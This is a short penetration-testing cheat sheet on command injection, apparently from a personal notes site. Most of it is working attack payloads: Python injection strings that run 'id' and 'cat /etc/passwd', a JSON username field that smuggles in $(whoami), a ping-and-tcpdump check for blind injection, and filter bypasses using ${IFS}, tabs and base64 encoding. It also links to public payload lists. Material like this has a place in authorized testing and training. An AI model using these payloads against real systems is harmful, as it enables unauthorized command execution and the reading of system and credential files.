Command Injection

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application.

Wordlists

LogoGitHub - payloadbox/command-injection-payload-list: 🎯 Command Injection Payload ListGitHub

ICMP ping check

# Run tcpdump
sudo tcpdump -i tun0 -A icmp

# Ping from target
;ping -c 4 10.10.10.11

Check special chars

LogoSecLists/Fuzzing/special-chars.txt at master · danielmiessler/SecListsGitHub
/

Various injections

# Python command injections
') + str(__import__('os').system('id')) #
') + str(__import__('os').system('cat /etc/passwd')) #
' + __import__('os').popen('id').read() + '
'+__import__('os').system('id')+'

# API Injections using JSON
API injection using JSON
{
	"username": "mczen84$(whoami)"
}

Filter bypasses

%09 # Using tabs
${IFS} # Space
${PATH:0:1} # Is /

# Encode string base64
echo -n 'cat /etc/passwd | grep 33' | base64

Injection points to check

  • Input parameters

  • HTTP Headers

  • Cookies

Last updated

Was this helpful?